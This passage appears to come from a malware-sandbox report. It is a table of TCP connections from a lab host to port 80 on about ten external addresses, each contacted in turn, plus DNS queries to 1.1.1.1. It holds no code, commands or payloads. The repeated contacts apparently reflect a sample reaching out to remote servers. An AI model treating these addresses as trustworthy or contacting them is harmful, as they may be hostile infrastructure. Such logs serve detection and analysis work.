Jan 11, 2025 07:59:23.341746092 CET	80	49981	104.18.73.116	192.168.2.5
Jan 11, 2025 07:59:23.341759920 CET	80	49981	104.18.73.116	192.168.2.5
Jan 11, 2025 07:59:23.341774940 CET	80	49981	104.18.73.116	192.168.2.5
Jan 11, 2025 07:59:23.341789961 CET	80	49981	104.18.73.116	192.168.2.5
Jan 11, 2025 07:59:23.341804981 CET	80	49981	104.18.73.116	192.168.2.5
Jan 11, 2025 07:59:23.341834068 CET	49981	80	192.168.2.5	104.18.73.116
Jan 11, 2025 07:59:23.341893911 CET	49981	80	192.168.2.5	104.18.73.116
Jan 11, 2025 07:59:23.342861891 CET	80	49981	104.18.73.116	192.168.2.5
Jan 11, 2025 07:59:23.342914104 CET	49981	80	192.168.2.5	104.18.73.116
Jan 11, 2025 07:59:24.396615982 CET	49981	80	192.168.2.5	104.18.73.116
Jan 11, 2025 07:59:25.415333033 CET	49984	80	192.168.2.5	104.18.73.116
Jan 11, 2025 07:59:25.420272112 CET	80	49984	104.18.73.116	192.168.2.5
Jan 11, 2025 07:59:25.420380116 CET	49984	80	192.168.2.5	104.18.73.116
Jan 11, 2025 07:59:25.430177927 CET	49984	80	192.168.2.5	104.18.73.116
Jan 11, 2025 07:59:25.435127020 CET	80	49984	104.18.73.116	192.168.2.5
Jan 11, 2025 07:59:25.868436098 CET	80	49984	104.18.73.116	192.168.2.5
Jan 11, 2025 07:59:25.868829966 CET	80	49984	104.18.73.116	192.168.2.5
Jan 11, 2025 07:59:25.868891001 CET	49984	80	192.168.2.5	104.18.73.116
Jan 11, 2025 07:59:25.871037006 CET	49984	80	192.168.2.5	104.18.73.116
Jan 11, 2025 07:59:25.875821114 CET	80	49984	104.18.73.116	192.168.2.5
Jan 11, 2025 07:59:30.924953938 CET	49985	80	192.168.2.5	66.29.148.78
Jan 11, 2025 07:59:30.929723978 CET	80	49985	66.29.148.78	192.168.2.5
Jan 11, 2025 07:59:30.929873943 CET	49985	80	192.168.2.5	66.29.148.78
Jan 11, 2025 07:59:30.944973946 CET	49985	80	192.168.2.5	66.29.148.78
Jan 11, 2025 07:59:30.949810982 CET	80	49985	66.29.148.78	192.168.2.5
Jan 11, 2025 07:59:31.515908957 CET	80	49985	66.29.148.78	192.168.2.5
Jan 11, 2025 07:59:31.515919924 CET	80	49985	66.29.148.78	192.168.2.5
Jan 11, 2025 07:59:31.515928984 CET	80	49985	66.29.148.78	192.168.2.5
Jan 11, 2025 07:59:31.515964985 CET	49985	80	192.168.2.5	66.29.148.78
Jan 11, 2025 07:59:31.515988111 CET	80	49985	66.29.148.78	192.168.2.5
Jan 11, 2025 07:59:31.516036987 CET	49985	80	192.168.2.5	66.29.148.78
Jan 11, 2025 07:59:32.489459991 CET	49985	80	192.168.2.5	66.29.148.78
Jan 11, 2025 07:59:33.493670940 CET	49986	80	192.168.2.5	66.29.148.78
Jan 11, 2025 07:59:33.498439074 CET	80	49986	66.29.148.78	192.168.2.5
Jan 11, 2025 07:59:33.498541117 CET	49986	80	192.168.2.5	66.29.148.78
Jan 11, 2025 07:59:33.513623953 CET	49986	80	192.168.2.5	66.29.148.78
Jan 11, 2025 07:59:33.518388033 CET	80	49986	66.29.148.78	192.168.2.5
Jan 11, 2025 07:59:34.086443901 CET	80	49986	66.29.148.78	192.168.2.5
Jan 11, 2025 07:59:34.086462975 CET	80	49986	66.29.148.78	192.168.2.5
Jan 11, 2025 07:59:34.086513996 CET	80	49986	66.29.148.78	192.168.2.5
Jan 11, 2025 07:59:34.086530924 CET	49986	80	192.168.2.5	66.29.148.78
Jan 11, 2025 07:59:34.086592913 CET	49986	80	192.168.2.5	66.29.148.78
Jan 11, 2025 07:59:35.029073954 CET	49986	80	192.168.2.5	66.29.148.78
Jan 11, 2025 07:59:36.040882111 CET	49987	80	192.168.2.5	66.29.148.78
Jan 11, 2025 07:59:36.045639992 CET	80	49987	66.29.148.78	192.168.2.5
Jan 11, 2025 07:59:36.045744896 CET	49987	80	192.168.2.5	66.29.148.78
Jan 11, 2025 07:59:36.061486006 CET	49987	80	192.168.2.5	66.29.148.78
Jan 11, 2025 07:59:36.066277981 CET	80	49987	66.29.148.78	192.168.2.5
Jan 11, 2025 07:59:36.066390991 CET	80	49987	66.29.148.78	192.168.2.5
Jan 11, 2025 07:59:36.622050047 CET	80	49987	66.29.148.78	192.168.2.5
Jan 11, 2025 07:59:36.622062922 CET	80	49987	66.29.148.78	192.168.2.5
Jan 11, 2025 07:59:36.622075081 CET	80	49987	66.29.148.78	192.168.2.5
Jan 11, 2025 07:59:36.622140884 CET	49987	80	192.168.2.5	66.29.148.78
Jan 11, 2025 07:59:36.622169971 CET	49987	80	192.168.2.5	66.29.148.78
Jan 11, 2025 07:59:37.568428040 CET	49987	80	192.168.2.5	66.29.148.78
Jan 11, 2025 07:59:38.588483095 CET	49988	80	192.168.2.5	66.29.148.78
Jan 11, 2025 07:59:38.593339920 CET	80	49988	66.29.148.78	192.168.2.5
Jan 11, 2025 07:59:38.593429089 CET	49988	80	192.168.2.5	66.29.148.78
Jan 11, 2025 07:59:38.603544950 CET	49988	80	192.168.2.5	66.29.148.78
Jan 11, 2025 07:59:38.608344078 CET	80	49988	66.29.148.78	192.168.2.5
Jan 11, 2025 07:59:39.170089006 CET	80	49988	66.29.148.78	192.168.2.5
Jan 11, 2025 07:59:39.170156956 CET	80	49988	66.29.148.78	192.168.2.5
Jan 11, 2025 07:59:39.170171022 CET	80	49988	66.29.148.78	192.168.2.5
Jan 11, 2025 07:59:39.170296907 CET	49988	80	192.168.2.5	66.29.148.78
Jan 11, 2025 07:59:39.170351982 CET	49988	80	192.168.2.5	66.29.148.78
Jan 11, 2025 07:59:39.173068047 CET	49988	80	192.168.2.5	66.29.148.78
Jan 11, 2025 07:59:39.177927017 CET	80	49988	66.29.148.78	192.168.2.5
Jan 11, 2025 07:59:44.704552889 CET	49989	80	192.168.2.5	207.148.38.19
Jan 11, 2025 07:59:44.711092949 CET	80	49989	207.148.38.19	192.168.2.5
Jan 11, 2025 07:59:44.711168051 CET	49989	80	192.168.2.5	207.148.38.19
Jan 11, 2025 07:59:44.728250980 CET	49989	80	192.168.2.5	207.148.38.19
Jan 11, 2025 07:59:44.735644102 CET	80	49989	207.148.38.19	192.168.2.5
Jan 11, 2025 07:59:45.835555077 CET	80	49989	207.148.38.19	192.168.2.5
Jan 11, 2025 07:59:45.835741997 CET	80	49989	207.148.38.19	192.168.2.5
Jan 11, 2025 07:59:45.835810900 CET	49989	80	192.168.2.5	207.148.38.19
Jan 11, 2025 07:59:46.240510941 CET	49989	80	192.168.2.5	207.148.38.19
Jan 11, 2025 07:59:47.259171963 CET	49990	80	192.168.2.5	207.148.38.19
Jan 11, 2025 07:59:47.264039040 CET	80	49990	207.148.38.19	192.168.2.5
Jan 11, 2025 07:59:47.264131069 CET	49990	80	192.168.2.5	207.148.38.19
Jan 11, 2025 07:59:47.289007902 CET	49990	80	192.168.2.5	207.148.38.19
Jan 11, 2025 07:59:47.293945074 CET	80	49990	207.148.38.19	192.168.2.5
Jan 11, 2025 07:59:48.391503096 CET	80	49990	207.148.38.19	192.168.2.5
Jan 11, 2025 07:59:48.391604900 CET	80	49990	207.148.38.19	192.168.2.5
Jan 11, 2025 07:59:48.391803026 CET	49990	80	192.168.2.5	207.148.38.19
Jan 11, 2025 07:59:48.802822113 CET	49990	80	192.168.2.5	207.148.38.19
Jan 11, 2025 07:59:49.822345018 CET	49991	80	192.168.2.5	207.148.38.19
Jan 11, 2025 07:59:49.827250004 CET	80	49991	207.148.38.19	192.168.2.5
Jan 11, 2025 07:59:49.827398062 CET	49991	80	192.168.2.5	207.148.38.19
Jan 11, 2025 07:59:49.845706940 CET	49991	80	192.168.2.5	207.148.38.19
Jan 11, 2025 07:59:49.850672960 CET	80	49991	207.148.38.19	192.168.2.5
Jan 11, 2025 07:59:49.850780964 CET	80	49991	207.148.38.19	192.168.2.5
Jan 11, 2025 07:59:50.951680899 CET	80	49991	207.148.38.19	192.168.2.5
Jan 11, 2025 07:59:50.951776028 CET	80	49991	207.148.38.19	192.168.2.5
Jan 11, 2025 07:59:50.951845884 CET	49991	80	192.168.2.5	207.148.38.19
Jan 11, 2025 07:59:51.349755049 CET	49991	80	192.168.2.5	207.148.38.19
Jan 11, 2025 07:59:52.368510008 CET	49992	80	192.168.2.5	207.148.38.19
Jan 11, 2025 07:59:52.373462915 CET	80	49992	207.148.38.19	192.168.2.5
Jan 11, 2025 07:59:52.373606920 CET	49992	80	192.168.2.5	207.148.38.19
Jan 11, 2025 07:59:52.382626057 CET	49992	80	192.168.2.5	207.148.38.19
Jan 11, 2025 07:59:52.387550116 CET	80	49992	207.148.38.19	192.168.2.5
Jan 11, 2025 07:59:53.498323917 CET	80	49992	207.148.38.19	192.168.2.5
Jan 11, 2025 07:59:53.498507023 CET	80	49992	207.148.38.19	192.168.2.5
Jan 11, 2025 07:59:53.498835087 CET	49992	80	192.168.2.5	207.148.38.19
Jan 11, 2025 07:59:53.502052069 CET	49992	80	192.168.2.5	207.148.38.19
Jan 11, 2025 07:59:53.506813049 CET	80	49992	207.148.38.19	192.168.2.5
Jan 11, 2025 07:59:58.553740025 CET	49993	80	192.168.2.5	62.116.130.8
Jan 11, 2025 07:59:58.558671951 CET	80	49993	62.116.130.8	192.168.2.5
Jan 11, 2025 07:59:58.559400082 CET	49993	80	192.168.2.5	62.116.130.8
Jan 11, 2025 07:59:58.577214003 CET	49993	80	192.168.2.5	62.116.130.8
Jan 11, 2025 07:59:58.582091093 CET	80	49993	62.116.130.8	192.168.2.5
Jan 11, 2025 07:59:59.214616060 CET	80	49993	62.116.130.8	192.168.2.5
Jan 11, 2025 07:59:59.214632988 CET	80	49993	62.116.130.8	192.168.2.5
Jan 11, 2025 07:59:59.214742899 CET	49993	80	192.168.2.5	62.116.130.8
Jan 11, 2025 08:00:00.084158897 CET	49993	80	192.168.2.5	62.116.130.8
Jan 11, 2025 08:00:01.150258064 CET	49994	80	192.168.2.5	62.116.130.8
Jan 11, 2025 08:00:01.155384064 CET	80	49994	62.116.130.8	192.168.2.5
Jan 11, 2025 08:00:01.155527115 CET	49994	80	192.168.2.5	62.116.130.8
Jan 11, 2025 08:00:01.278460026 CET	49994	80	192.168.2.5	62.116.130.8
Jan 11, 2025 08:00:01.283405066 CET	80	49994	62.116.130.8	192.168.2.5
Jan 11, 2025 08:00:01.796319962 CET	80	49994	62.116.130.8	192.168.2.5
Jan 11, 2025 08:00:01.796343088 CET	80	49994	62.116.130.8	192.168.2.5
Jan 11, 2025 08:00:01.796494961 CET	49994	80	192.168.2.5	62.116.130.8
Jan 11, 2025 08:00:02.787220001 CET	49994	80	192.168.2.5	62.116.130.8
Jan 11, 2025 08:00:03.812877893 CET	49995	80	192.168.2.5	62.116.130.8
Jan 11, 2025 08:00:03.817837000 CET	80	49995	62.116.130.8	192.168.2.5
Jan 11, 2025 08:00:03.817967892 CET	49995	80	192.168.2.5	62.116.130.8
Jan 11, 2025 08:00:03.849353075 CET	49995	80	192.168.2.5	62.116.130.8
Jan 11, 2025 08:00:03.854312897 CET	80	49995	62.116.130.8	192.168.2.5
Jan 11, 2025 08:00:03.854412079 CET	80	49995	62.116.130.8	192.168.2.5
Jan 11, 2025 08:00:04.456414938 CET	80	49995	62.116.130.8	192.168.2.5
Jan 11, 2025 08:00:04.456465006 CET	80	49995	62.116.130.8	192.168.2.5
Jan 11, 2025 08:00:04.456526041 CET	49995	80	192.168.2.5	62.116.130.8
Jan 11, 2025 08:00:05.365226984 CET	49995	80	192.168.2.5	62.116.130.8
Jan 11, 2025 08:00:06.574378014 CET	49996	80	192.168.2.5	62.116.130.8
Jan 11, 2025 08:00:06.579411983 CET	80	49996	62.116.130.8	192.168.2.5
Jan 11, 2025 08:00:06.579531908 CET	49996	80	192.168.2.5	62.116.130.8
Jan 11, 2025 08:00:06.590540886 CET	49996	80	192.168.2.5	62.116.130.8
Jan 11, 2025 08:00:06.595351934 CET	80	49996	62.116.130.8	192.168.2.5
Jan 11, 2025 08:00:07.246386051 CET	80	49996	62.116.130.8	192.168.2.5
Jan 11, 2025 08:00:07.246443033 CET	80	49996	62.116.130.8	192.168.2.5
Jan 11, 2025 08:00:07.246556044 CET	49996	80	192.168.2.5	62.116.130.8
Jan 11, 2025 08:00:07.249239922 CET	49996	80	192.168.2.5	62.116.130.8
Jan 11, 2025 08:00:07.254184008 CET	80	49996	62.116.130.8	192.168.2.5
Jan 11, 2025 08:00:12.274733067 CET	49997	80	192.168.2.5	104.21.88.139
Jan 11, 2025 08:00:12.279603004 CET	80	49997	104.21.88.139	192.168.2.5
Jan 11, 2025 08:00:12.279685020 CET	49997	80	192.168.2.5	104.21.88.139
Jan 11, 2025 08:00:12.295887947 CET	49997	80	192.168.2.5	104.21.88.139
Jan 11, 2025 08:00:12.300772905 CET	80	49997	104.21.88.139	192.168.2.5
Jan 11, 2025 08:00:12.911812067 CET	80	49997	104.21.88.139	192.168.2.5
Jan 11, 2025 08:00:12.911858082 CET	80	49997	104.21.88.139	192.168.2.5
Jan 11, 2025 08:00:12.912045002 CET	49997	80	192.168.2.5	104.21.88.139
Jan 11, 2025 08:00:12.912525892 CET	80	49997	104.21.88.139	192.168.2.5
Jan 11, 2025 08:00:12.912692070 CET	49997	80	192.168.2.5	104.21.88.139
Jan 11, 2025 08:00:13.802679062 CET	49997	80	192.168.2.5	104.21.88.139
Jan 11, 2025 08:00:14.820947886 CET	49998	80	192.168.2.5	104.21.88.139
Jan 11, 2025 08:00:14.825860023 CET	80	49998	104.21.88.139	192.168.2.5
Jan 11, 2025 08:00:14.826097965 CET	49998	80	192.168.2.5	104.21.88.139
Jan 11, 2025 08:00:14.840133905 CET	49998	80	192.168.2.5	104.21.88.139
Jan 11, 2025 08:00:14.845019102 CET	80	49998	104.21.88.139	192.168.2.5
Jan 11, 2025 08:00:15.457748890 CET	80	49998	104.21.88.139	192.168.2.5
Jan 11, 2025 08:00:15.457775116 CET	80	49998	104.21.88.139	192.168.2.5
Jan 11, 2025 08:00:15.458036900 CET	49998	80	192.168.2.5	104.21.88.139
Jan 11, 2025 08:00:15.459132910 CET	80	49998	104.21.88.139	192.168.2.5
Jan 11, 2025 08:00:15.459285021 CET	49998	80	192.168.2.5	104.21.88.139
Jan 11, 2025 08:00:16.349612951 CET	49998	80	192.168.2.5	104.21.88.139
Jan 11, 2025 08:00:17.368745089 CET	49999	80	192.168.2.5	104.21.88.139
Jan 11, 2025 08:00:17.373789072 CET	80	49999	104.21.88.139	192.168.2.5
Jan 11, 2025 08:00:17.373878002 CET	49999	80	192.168.2.5	104.21.88.139
Jan 11, 2025 08:00:17.389596939 CET	49999	80	192.168.2.5	104.21.88.139
Jan 11, 2025 08:00:17.394650936 CET	80	49999	104.21.88.139	192.168.2.5
Jan 11, 2025 08:00:17.394718885 CET	80	49999	104.21.88.139	192.168.2.5
Jan 11, 2025 08:00:18.014877081 CET	80	49999	104.21.88.139	192.168.2.5
Jan 11, 2025 08:00:18.014899969 CET	80	49999	104.21.88.139	192.168.2.5
Jan 11, 2025 08:00:18.014957905 CET	49999	80	192.168.2.5	104.21.88.139
Jan 11, 2025 08:00:18.015790939 CET	80	49999	104.21.88.139	192.168.2.5
Jan 11, 2025 08:00:18.015853882 CET	49999	80	192.168.2.5	104.21.88.139
Jan 11, 2025 08:00:18.896445036 CET	49999	80	192.168.2.5	104.21.88.139
Jan 11, 2025 08:00:19.914946079 CET	50000	80	192.168.2.5	104.21.88.139
Jan 11, 2025 08:00:19.920140982 CET	80	50000	104.21.88.139	192.168.2.5
Jan 11, 2025 08:00:19.920315981 CET	50000	80	192.168.2.5	104.21.88.139
Jan 11, 2025 08:00:19.929486036 CET	50000	80	192.168.2.5	104.21.88.139
Jan 11, 2025 08:00:19.934396982 CET	80	50000	104.21.88.139	192.168.2.5
Jan 11, 2025 08:00:20.530345917 CET	80	50000	104.21.88.139	192.168.2.5
Jan 11, 2025 08:00:20.530389071 CET	80	50000	104.21.88.139	192.168.2.5
Jan 11, 2025 08:00:20.530561924 CET	50000	80	192.168.2.5	104.21.88.139
Jan 11, 2025 08:00:20.530788898 CET	80	50000	104.21.88.139	192.168.2.5
Jan 11, 2025 08:00:20.530848026 CET	50000	80	192.168.2.5	104.21.88.139
Jan 11, 2025 08:00:20.533173084 CET	50000	80	192.168.2.5	104.21.88.139
Jan 11, 2025 08:00:20.538109064 CET	80	50000	104.21.88.139	192.168.2.5
Jan 11, 2025 08:00:25.740654945 CET	50001	80	192.168.2.5	185.106.208.3
Jan 11, 2025 08:00:25.745495081 CET	80	50001	185.106.208.3	192.168.2.5
Jan 11, 2025 08:00:25.745614052 CET	50001	80	192.168.2.5	185.106.208.3
Jan 11, 2025 08:00:25.760920048 CET	50001	80	192.168.2.5	185.106.208.3
Jan 11, 2025 08:00:25.765752077 CET	80	50001	185.106.208.3	192.168.2.5
Jan 11, 2025 08:00:26.469084978 CET	80	50001	185.106.208.3	192.168.2.5
Jan 11, 2025 08:00:26.469114065 CET	80	50001	185.106.208.3	192.168.2.5
Jan 11, 2025 08:00:26.469199896 CET	50001	80	192.168.2.5	185.106.208.3
Jan 11, 2025 08:00:27.275214911 CET	50001	80	192.168.2.5	185.106.208.3
Jan 11, 2025 08:00:28.290235043 CET	50002	80	192.168.2.5	185.106.208.3
Jan 11, 2025 08:00:28.295350075 CET	80	50002	185.106.208.3	192.168.2.5
Jan 11, 2025 08:00:28.295532942 CET	50002	80	192.168.2.5	185.106.208.3
Jan 11, 2025 08:00:28.310503006 CET	50002	80	192.168.2.5	185.106.208.3
Jan 11, 2025 08:00:28.315332890 CET	80	50002	185.106.208.3	192.168.2.5
Jan 11, 2025 08:00:29.047530890 CET	80	50002	185.106.208.3	192.168.2.5
Jan 11, 2025 08:00:29.047593117 CET	80	50002	185.106.208.3	192.168.2.5
Jan 11, 2025 08:00:29.047682047 CET	50002	80	192.168.2.5	185.106.208.3
Jan 11, 2025 08:00:29.818327904 CET	50002	80	192.168.2.5	185.106.208.3
Jan 11, 2025 08:00:30.837261915 CET	50003	80	192.168.2.5	185.106.208.3
Jan 11, 2025 08:00:30.842283964 CET	80	50003	185.106.208.3	192.168.2.5
Jan 11, 2025 08:00:30.842410088 CET	50003	80	192.168.2.5	185.106.208.3
Jan 11, 2025 08:00:30.857562065 CET	50003	80	192.168.2.5	185.106.208.3
Jan 11, 2025 08:00:30.862510920 CET	80	50003	185.106.208.3	192.168.2.5
Jan 11, 2025 08:00:30.862576008 CET	80	50003	185.106.208.3	192.168.2.5
Jan 11, 2025 08:00:31.573682070 CET	80	50003	185.106.208.3	192.168.2.5
Jan 11, 2025 08:00:31.573715925 CET	80	50003	185.106.208.3	192.168.2.5
Jan 11, 2025 08:00:31.573798895 CET	50003	80	192.168.2.5	185.106.208.3
Jan 11, 2025 08:00:32.365272045 CET	50003	80	192.168.2.5	185.106.208.3
Jan 11, 2025 08:00:33.384310961 CET	50004	80	192.168.2.5	185.106.208.3
Jan 11, 2025 08:00:33.389539003 CET	80	50004	185.106.208.3	192.168.2.5
Jan 11, 2025 08:00:33.389645100 CET	50004	80	192.168.2.5	185.106.208.3
Jan 11, 2025 08:00:33.399070024 CET	50004	80	192.168.2.5	185.106.208.3
Jan 11, 2025 08:00:33.403996944 CET	80	50004	185.106.208.3	192.168.2.5
Jan 11, 2025 08:00:34.140345097 CET	80	50004	185.106.208.3	192.168.2.5
Jan 11, 2025 08:00:34.140445948 CET	80	50004	185.106.208.3	192.168.2.5
Jan 11, 2025 08:00:34.140692949 CET	50004	80	192.168.2.5	185.106.208.3
Jan 11, 2025 08:00:34.142872095 CET	50004	80	192.168.2.5	185.106.208.3
Jan 11, 2025 08:00:34.147768974 CET	80	50004	185.106.208.3	192.168.2.5
Jan 11, 2025 08:00:39.164835930 CET	50005	80	192.168.2.5	13.248.169.48
Jan 11, 2025 08:00:39.169812918 CET	80	50005	13.248.169.48	192.168.2.5
Jan 11, 2025 08:00:39.169930935 CET	50005	80	192.168.2.5	13.248.169.48
Jan 11, 2025 08:00:39.184808969 CET	50005	80	192.168.2.5	13.248.169.48
Jan 11, 2025 08:00:39.189656973 CET	80	50005	13.248.169.48	192.168.2.5
Jan 11, 2025 08:00:39.646627903 CET	80	50005	13.248.169.48	192.168.2.5
Jan 11, 2025 08:00:39.646714926 CET	80	50005	13.248.169.48	192.168.2.5
Jan 11, 2025 08:00:39.646902084 CET	50005	80	192.168.2.5	13.248.169.48
Jan 11, 2025 08:00:40.693348885 CET	50005	80	192.168.2.5	13.248.169.48
Jan 11, 2025 08:00:41.712145090 CET	50006	80	192.168.2.5	13.248.169.48
Jan 11, 2025 08:00:41.717103004 CET	80	50006	13.248.169.48	192.168.2.5
Jan 11, 2025 08:00:41.717273951 CET	50006	80	192.168.2.5	13.248.169.48
Jan 11, 2025 08:00:41.737482071 CET	50006	80	192.168.2.5	13.248.169.48
Jan 11, 2025 08:00:41.742413044 CET	80	50006	13.248.169.48	192.168.2.5
Jan 11, 2025 08:00:42.176539898 CET	80	50006	13.248.169.48	192.168.2.5
Jan 11, 2025 08:00:42.176600933 CET	80	50006	13.248.169.48	192.168.2.5
Jan 11, 2025 08:00:42.176656961 CET	50006	80	192.168.2.5	13.248.169.48
Jan 11, 2025 08:00:43.240097046 CET	50006	80	192.168.2.5	13.248.169.48
Jan 11, 2025 08:00:44.258856058 CET	50007	80	192.168.2.5	13.248.169.48
Jan 11, 2025 08:00:44.263892889 CET	80	50007	13.248.169.48	192.168.2.5
Jan 11, 2025 08:00:44.264074087 CET	50007	80	192.168.2.5	13.248.169.48
Jan 11, 2025 08:00:44.278764963 CET	50007	80	192.168.2.5	13.248.169.48
Jan 11, 2025 08:00:44.283665895 CET	80	50007	13.248.169.48	192.168.2.5
Jan 11, 2025 08:00:44.283859968 CET	80	50007	13.248.169.48	192.168.2.5
Jan 11, 2025 08:00:44.741954088 CET	80	50007	13.248.169.48	192.168.2.5
Jan 11, 2025 08:00:44.741976023 CET	80	50007	13.248.169.48	192.168.2.5
Jan 11, 2025 08:00:44.742151022 CET	50007	80	192.168.2.5	13.248.169.48
Jan 11, 2025 08:00:45.786936045 CET	50007	80	192.168.2.5	13.248.169.48
Jan 11, 2025 08:00:46.805603981 CET	50008	80	192.168.2.5	13.248.169.48
Jan 11, 2025 08:00:46.811048985 CET	80	50008	13.248.169.48	192.168.2.5
Jan 11, 2025 08:00:46.811211109 CET	50008	80	192.168.2.5	13.248.169.48
Jan 11, 2025 08:00:46.820561886 CET	50008	80	192.168.2.5	13.248.169.48
Jan 11, 2025 08:00:46.825536966 CET	80	50008	13.248.169.48	192.168.2.5
Jan 11, 2025 08:00:47.275473118 CET	80	50008	13.248.169.48	192.168.2.5
Jan 11, 2025 08:00:47.275553942 CET	80	50008	13.248.169.48	192.168.2.5
Jan 11, 2025 08:00:47.275666952 CET	50008	80	192.168.2.5	13.248.169.48
Jan 11, 2025 08:00:47.278261900 CET	50008	80	192.168.2.5	13.248.169.48
Jan 11, 2025 08:00:47.283065081 CET	80	50008	13.248.169.48	192.168.2.5
Jan 11, 2025 08:00:52.316195965 CET	50009	80	192.168.2.5	3.33.130.190
Jan 11, 2025 08:00:52.321074009 CET	80	50009	3.33.130.190	192.168.2.5
Jan 11, 2025 08:00:52.321182013 CET	50009	80	192.168.2.5	3.33.130.190
Jan 11, 2025 08:00:52.335611105 CET	50009	80	192.168.2.5	3.33.130.190
Jan 11, 2025 08:00:52.340563059 CET	80	50009	3.33.130.190	192.168.2.5
Jan 11, 2025 08:00:53.849724054 CET	50009	80	192.168.2.5	3.33.130.190
Jan 11, 2025 08:00:53.854928017 CET	80	50009	3.33.130.190	192.168.2.5
Jan 11, 2025 08:00:53.855115891 CET	50009	80	192.168.2.5	3.33.130.190
Jan 11, 2025 08:00:54.911411047 CET	50010	80	192.168.2.5	3.33.130.190
Jan 11, 2025 08:00:54.916290998 CET	80	50010	3.33.130.190	192.168.2.5
Jan 11, 2025 08:00:54.916387081 CET	50010	80	192.168.2.5	3.33.130.190
Jan 11, 2025 08:00:55.031445026 CET	50010	80	192.168.2.5	3.33.130.190
Jan 11, 2025 08:00:55.036276102 CET	80	50010	3.33.130.190	192.168.2.5
Jan 11, 2025 08:00:55.391676903 CET	80	50010	3.33.130.190	192.168.2.5
Jan 11, 2025 08:00:55.391725063 CET	80	50010	3.33.130.190	192.168.2.5
Jan 11, 2025 08:00:55.391788960 CET	50010	80	192.168.2.5	3.33.130.190
Jan 11, 2025 08:00:56.536905050 CET	50010	80	192.168.2.5	3.33.130.190
Jan 11, 2025 08:00:57.667329073 CET	50011	80	192.168.2.5	3.33.130.190
Jan 11, 2025 08:00:57.672281981 CET	80	50011	3.33.130.190	192.168.2.5
Jan 11, 2025 08:00:57.672365904 CET	50011	80	192.168.2.5	3.33.130.190
Jan 11, 2025 08:00:57.688364029 CET	50011	80	192.168.2.5	3.33.130.190
Jan 11, 2025 08:00:57.693325043 CET	80	50011	3.33.130.190	192.168.2.5
Jan 11, 2025 08:00:57.693355083 CET	80	50011	3.33.130.190	192.168.2.5
Jan 11, 2025 08:00:58.126909971 CET	80	50011	3.33.130.190	192.168.2.5
Jan 11, 2025 08:00:58.126996040 CET	80	50011	3.33.130.190	192.168.2.5
Jan 11, 2025 08:00:58.127049923 CET	50011	80	192.168.2.5	3.33.130.190
Jan 11, 2025 08:00:59.193229914 CET	50011	80	192.168.2.5	3.33.130.190
Jan 11, 2025 08:01:00.223045111 CET	50012	80	192.168.2.5	3.33.130.190
Jan 11, 2025 08:01:00.229815960 CET	80	50012	3.33.130.190	192.168.2.5
Jan 11, 2025 08:01:00.229901075 CET	50012	80	192.168.2.5	3.33.130.190
Jan 11, 2025 08:01:00.252367973 CET	50012	80	192.168.2.5	3.33.130.190
Jan 11, 2025 08:01:00.257397890 CET	80	50012	3.33.130.190	192.168.2.5
Jan 11, 2025 08:01:01.694276094 CET	80	50012	3.33.130.190	192.168.2.5
Jan 11, 2025 08:01:01.694354057 CET	80	50012	3.33.130.190	192.168.2.5
Jan 11, 2025 08:01:01.694493055 CET	50012	80	192.168.2.5	3.33.130.190
Jan 11, 2025 08:01:01.697323084 CET	50012	80	192.168.2.5	3.33.130.190
Jan 11, 2025 08:01:01.702182055 CET	80	50012	3.33.130.190	192.168.2.5
Jan 11, 2025 08:01:06.726411104 CET	50013	80	192.168.2.5	199.192.23.123
Jan 11, 2025 08:01:06.731266022 CET	80	50013	199.192.23.123	192.168.2.5
Jan 11, 2025 08:01:06.731445074 CET	50013	80	192.168.2.5	199.192.23.123
Jan 11, 2025 08:01:06.746052027 CET	50013	80	192.168.2.5	199.192.23.123
Jan 11, 2025 08:01:06.750925064 CET	80	50013	199.192.23.123	192.168.2.5
Jan 11, 2025 08:01:07.359812021 CET	80	50013	199.192.23.123	192.168.2.5
Jan 11, 2025 08:01:07.359863997 CET	80	50013	199.192.23.123	192.168.2.5
Jan 11, 2025 08:01:07.359935999 CET	50013	80	192.168.2.5	199.192.23.123
Jan 11, 2025 08:01:08.255868912 CET	50013	80	192.168.2.5	199.192.23.123
Jan 11, 2025 08:01:09.275706053 CET	50014	80	192.168.2.5	199.192.23.123
Jan 11, 2025 08:01:09.280740023 CET	80	50014	199.192.23.123	192.168.2.5
Jan 11, 2025 08:01:09.280966997 CET	50014	80	192.168.2.5	199.192.23.123
Jan 11, 2025 08:01:09.301122904 CET	50014	80	192.168.2.5	199.192.23.123
Jan 11, 2025 08:01:09.306736946 CET	80	50014	199.192.23.123	192.168.2.5
Jan 11, 2025 08:01:09.917073965 CET	80	50014	199.192.23.123	192.168.2.5
Jan 11, 2025 08:01:09.917128086 CET	80	50014	199.192.23.123	192.168.2.5
Jan 11, 2025 08:01:09.917349100 CET	50014	80	192.168.2.5	199.192.23.123
Jan 11, 2025 08:01:11.271262884 CET	50014	80	192.168.2.5	199.192.23.123

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 07:59:01.364593029 CET	60211	53	192.168.2.5	1.1.1.1
Jan 11, 2025 07:59:01.600001097 CET	53	60211	1.1.1.1	192.168.2.5
Jan 11, 2025 07:59:17.571574926 CET	53870	53	192.168.2.5	1.1.1.1
Jan 11, 2025 07:59:17.592466116 CET	53	53870	1.1.1.1	192.168.2.5
Jan 11, 2025 07:59:30.888005972 CET	58621	53	192.168.2.5	1.1.1.1
Jan 11, 2025 07:59:30.922322989 CET	53	58621	1.1.1.1	192.168.2.5
Jan 11, 2025 07:59:44.181915045 CET	55460	53	192.168.2.5	1.1.1.1
Jan 11, 2025 07:59:44.686825037 CET	53	55460	1.1.1.1	192.168.2.5
Jan 11, 2025 07:59:58.510548115 CET	56594	53	192.168.2.5	1.1.1.1
Jan 11, 2025 07:59:58.548343897 CET	53	56594	1.1.1.1	192.168.2.5
Jan 11, 2025 08:00:12.259572983 CET	60380	53	192.168.2.5	1.1.1.1
Jan 11, 2025 08:00:12.272286892 CET	53	60380	1.1.1.1	192.168.2.5
Jan 11, 2025 08:00:25.541977882 CET	62964	53	192.168.2.5	1.1.1.1
Jan 11, 2025 08:00:25.737780094 CET	53	62964	1.1.1.1	192.168.2.5
Jan 11, 2025 08:00:39.150003910 CET	57542	53	192.168.2.5	1.1.1.1
Jan 11, 2025 08:00:39.162276030 CET	53	57542	1.1.1.1	192.168.2.5
Jan 11, 2025 08:00:52.290626049 CET	52065	53	192.168.2.5	1.1.1.1
Jan 11, 2025 08:00:52.313600063 CET	53	52065	1.1.1.1	192.168.2.5
Jan 11, 2025 08:01:06.712410927 CET	54310	53	192.168.2.5	1.1.1.1
Jan 11, 2025 08:01:06.723833084 CET	53	54310	1.1.1.1	192.168.2.5

